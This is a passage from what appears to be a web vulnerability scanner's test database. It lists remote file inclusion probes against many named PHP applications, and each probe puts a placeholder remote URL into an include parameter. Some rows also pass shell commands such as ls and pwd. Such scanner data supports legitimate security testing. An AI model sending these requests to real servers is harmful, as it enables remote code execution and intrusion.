(https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005834\",\"5292\",\"c\",\"/source.php?bibtexrootrel=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005835\",\"5292\",\"c\",\"/source/mod/rss/channeledit.php?Codebase=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005836\",\"5292\",\"c\",\"/source/mod/rss/post.php?Codebase=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005837\",\"5292\",\"c\",\"/source/mod/rss/view.php?Codebase=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005838\",\"5292\",\"c\",\"/source/mod/rss/viewitem.php?Codebase=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005839\",\"5292\",\"c\",\"/sources/Admin/admin_cats.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005840\",\"5292\",\"c\",\"/sources/Admin/admin_edit.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005841\",\"5292\",\"c\",\"/sources/Admin/admin_import.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005842\",\"5292\",\"c\",\"/sources/Admin/admin_templates.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005843\",\"5292\",\"c\",\"/sources/functions.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005844\",\"5292\",\"c\",\"/sources/help.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005845\",\"5292\",\"c\",\"/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005846\",\"5292\",\"c\",\"/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=@RFIURL?cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005847\",\"5292\",\"c\",\"/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005848\",\"5292\",\"c\",\"/sources/mail.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005849\",\"5292\",\"c\",\"/sources/misc/new_day.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005850\",\"5292\",\"c\",\"/sources/news.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005851\",\"5292\",\"c\",\"/sources/post.php?fil_config=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005852\",\"5292\",\"c\",\"/sources/template.php?CONFIG[main_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005853\",\"5292\",\"c\",\"/sources/tourney/index.php?page=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005854\",\"5292\",\"c\",\"/spaw/spaw_control.class.php?GLOBALS[spaw_root]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005855\",\"5292\",\"c\",\"/spaw/spaw_control.class.php?spaw_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005856\",\"5292\",\"c\",\"/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005857\",\"5292\",\"c\",\"/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005858\",\"5292\",\"c\",\"/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005859\",\"5292\",\"c\",\"/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005860\",\"5292\",\"c\",\"/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005861\",\"5292\",\"c\",\"/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005862\",\"5292\",\"c\",\"/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005863\",\"5292\",\"c\",\"/spellcheckwindowframeset.php?SpellIncPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005864\",\"5292\",\"c\",\"/squirrelcart/cart_content.php?cart_isp_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005865\",\"5292\",\"c\",\"/src/ark_inc.php?cfg_pear_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005866\",\"5292\",\"c\",\"/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005867\",\"5292\",\"c\",\"/src/scripture.php?pageHeaderFile=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005868\",\"5292\",\"c\",\"/starnet/themes/c-sky/main.inc.php?cmsdir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005869\",\"5292\",\"c\",\"/start.php?lang=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005870\",\"5292\",\"c\",\"/start.php?pg=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005871\",\"5292\",\"c\",\"/stat_modules/users_age/module.php?phpbb_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005872\",\"5292\",\"c\",\"/stats.php?vwar_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005873\",\"5292\",\"c\",\"/stats.php?vwar_root=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005874\",\"5292\",\"c\",\"/stphpapplication.php?STPHPLIB_DIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005875\",\"5292\",\"c\",\"/stphpbtnimage.php?STPHPLIB_DIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005876\",\"5292\",\"c\",\"/stphpform.php?STPHPLIB_DIR=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005877\",\"5292\",\"c\",\"/str.php?p=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005878\",\"5292\",\"c\",\"/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005879\",\"5292\",\"c\",\"/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005880\",\"5292\",\"c\",\"/strload.php?LangFile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005881\",\"5292\",\"c\",\"/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls -al&ABSOLUTE_PATH_STUDIP=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005882\",\"5292\",\"c\",\"/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls -al&_PHPLIB[libdir]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005883\",\"5292\",\"c\",\"/styles.php?toroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005884\",\"5292\",\"c\",\"/styles/default/global_header.php?installed=23&domain=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005885\",\"5292\",\"c\",\"/submit_abuse.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005886\",\"5292\",\"c\",\"/submit_comment.php?path_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005887\",\"5292\",\"c\",\"/subscp.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005888\",\"5292\",\"c\",\"/suite/index.php?pg=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005889\",\"5292\",\"c\",\"/suite/index.php?pg=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005890\",\"5292\",\"c\",\"/supasite/admin_auth_cookies.php?supa[db_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005891\",\"5292\",\"c\",\"/supasite/admin_mods.php?supa[db_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005892\",\"5292\",\"c\",\"/supasite/admin_news.php?supa[db_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005893\",\"5292\",\"c\",\"/supasite/admin_settings.php?supa[include_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005894\",\"5292\",\"c\",\"/supasite/admin_topics.php?supa[db_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005895\",\"5292\",\"c\",\"/supasite/admin_users.php?supa[db_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005896\",\"5292\",\"c\",\"/supasite/admin_utilities.php?supa[db_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005897\",\"5292\",\"c\",\"/supasite/backend_site.php?supa[include_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005898\",\"5292\",\"c\",\"/supasite/common_functions.php?supa[db_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005899\",\"5292\",\"c\",\"/supasite/site_comment.php?supa[db_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005900\",\"5292\",\"c\",\"/supasite/site_news.php?supa[db_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005901\",\"5292\",\"c\",\"/support/include/open_form.php?include_dir=@RFIURL?cmd=pwd\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005902\",\"5292\",\"c\",\"/support/index.php?main=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005903\",\"5292\",\"c\",\"/surveys/survey.inc.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005904\",\"5292\",\"c\",\"/sw/lib_comment/comment.php?doc_directory=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005905\",\"5292\",\"c\",\"/sw/lib_find/find.php?doc_directory=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005906\",\"5292\",\"c\",\"/sw/lib_session/session.php?doc_directory=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005907\",\"5292\",\"c\",\"/sw/lib_up_file/file.php?doc_directory=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005908\",\"5292\",\"c\",\"/sw/lib_up_file/find_file.php?doc_directory=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005909\",\"5292\",\"c\",\"/sw/lib_user/find_user.php?doc_directory=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005910\",\"5292\",\"c\",\"/sw/lib_user/user.php?doc_directory=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005911\",\"5292\",\"c\",\"/sys/code/box.inc.php?config[\\\"sipssys\\\"]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005912\",\"5292\",\"c\",\"/system/ImageImageMagick.php?glConf[path_system]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005913\",\"5292\",\"c\",\"/system/ImageImageMagick.php?glConf[path_system]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005914\",\"5292\",\"c\",\"/system/_b/contentFiles/gBIndex.php?gBRootPath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005915\",\"5292\",\"c\",\"/system/admin/include/item_main.php?GLOBALS=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005916\",\"5292\",\"c\",\"/system/admin/include/upload_form.php?GLOBALS=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005917\",\"5292\",\"c\",\"/system/command/admin.cmd.php?GLOBALS=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005918\",\"5292\",\"c\",\"/system/command/download.cmd.php?GLOBALS=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005919\",\"5292\",\"c\",\"/system/funcs/xkurl.php?PEARPATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005920\",\"5292\",\"c\",\"/system/includes/pageheaderdefault.inc.php?_sysSessionPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005921\",\"5292\",\"c\",\"/system/login.php?site_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005922\",\"5292\",\"c\",\"/tagit2b/tagmin/delTagUser.php?configpath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005923\",\"5292\",\"c\",\"/tags.php?BBCodeFile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005924\",\"5292\",\"c\",\"/taxonservice.php?dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005925\",\"5292\",\"c\",\"/teatro/pub/pub08_comments.php?basePath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005926\",\"5292\",\"c\",\"/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005927\",\"5292\",\"c\",\"/template.php?actionsPage=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005928\",\"5292\",\"c\",\"/template.php?blog_theme=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005929\",\"5292\",\"c\",\"/template.php?pagina=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005930\",\"5292\",\"c\",\"/template/Noir/index.php?site_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005931\",\"5292\",\"c\",\"/template/Vert/index.php?pageAll=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005932\",\"5292\",\"c\",\"/template/Vert/index.php?site_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005933\",\"5292\",\"c\",\"/template/barnraiser_01/p_new_password.tpl.php?templatePath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005934\",\"5292\",\"c\",\"/template/default/footer.php?ROOT_PATH=@RFIURL?cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005935\",\"5292\",\"c\",\"/template/default/test/header.php?ROOT_PATH=@RFIURL?cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005936\",\"5292\",\"c\",\"/template/gwb/user_bottom.php?config[template_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005937\",\"5292\",\"c\",\"/template/purpletech/base_include.php?page=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005938\",\"5292\",\"c\",\"/template/rwb/user_bottom.php?config[template_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005939\",\"5292\",\"c\",\"/template/rwb/user_bottom.php?config[template_path]=@RFIURL?&cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005940\",\"5292\",\"c\",\"/template_csv.php?rInfo[content]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005941\",\"5292\",\"c\",\"/templates/2blue/bodyTemplate.php?serverPath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005942\",\"5292\",\"c\",\"/templates/2blue/bodyTemplate.php?serverPath=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005943\",\"5292\",\"c\",\"/templates/Official/part_userprofile.php?template_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005944\",\"5292\",\"c\",\"/templates/barrel/template.tpl.php?renderer=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005945\",\"5292\",\"c\",\"/templates/barrel/template.tpl.php?renderer=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005946\",\"5292\",\"c\",\"/templates/barry/template.tpl.php?renderer=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005947\",\"5292\",\"c\",\"/templates/be2004-2/index.php?mosConfig_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005948\",\"5292\",\"c\",\"/templates/datumVonDatumBis.inc.php?root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"005949\",\"5292\",\"c\",\"/templates/default/header.inc.php?menu=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 